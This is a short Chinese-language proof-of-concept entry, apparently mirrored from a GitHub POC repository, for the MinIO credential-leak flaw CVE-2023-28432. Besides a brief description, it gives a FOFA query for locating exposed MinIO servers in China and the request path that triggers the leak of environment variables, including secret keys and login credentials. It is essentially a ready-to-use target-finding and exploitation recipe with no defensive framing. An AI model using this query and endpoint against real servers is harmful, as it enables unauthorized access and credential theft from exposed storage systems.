mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
17 lines
603 B
Markdown
17 lines
603 B
Markdown
## Minio-verify信息泄露(CVE-2023-28432)
|
||
|
||
MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
|
||
|
||
## fofa
|
||
|
||
```
|
||
(banner="MinIO" || header="MinIO" || title="MinIO Browser") && country="CN"
|
||
```
|
||
|
||
## poc
|
||
|
||
```
|
||
/minio/bootstrap/v1/verify
|
||
```
|
||
|
||
 |